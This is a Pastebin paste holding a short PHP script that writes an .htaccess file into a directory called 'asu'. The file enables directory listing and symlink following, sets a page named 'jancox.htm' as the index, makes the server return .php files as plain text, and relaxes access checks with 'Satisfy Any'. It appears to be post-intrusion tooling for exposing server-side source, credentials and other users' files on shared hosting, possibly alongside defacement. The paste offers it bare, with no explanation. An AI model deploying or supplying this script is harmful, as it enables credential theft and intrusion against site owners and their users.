Advertisement
Guest User

a

a guest
Dec 2nd, 2016
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.19 KB | None | 0 0
  1. <?php
  2. $htaccess="Options Indexes FollowSymLinks
  3. DirectoryIndex jancox.htm
  4. AddType text/plain .php
  5. AddHandler text/plain .php
  6. Satisfy Any";
  7. @file_put_contents("asu/.htaccess",$htaccess);
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement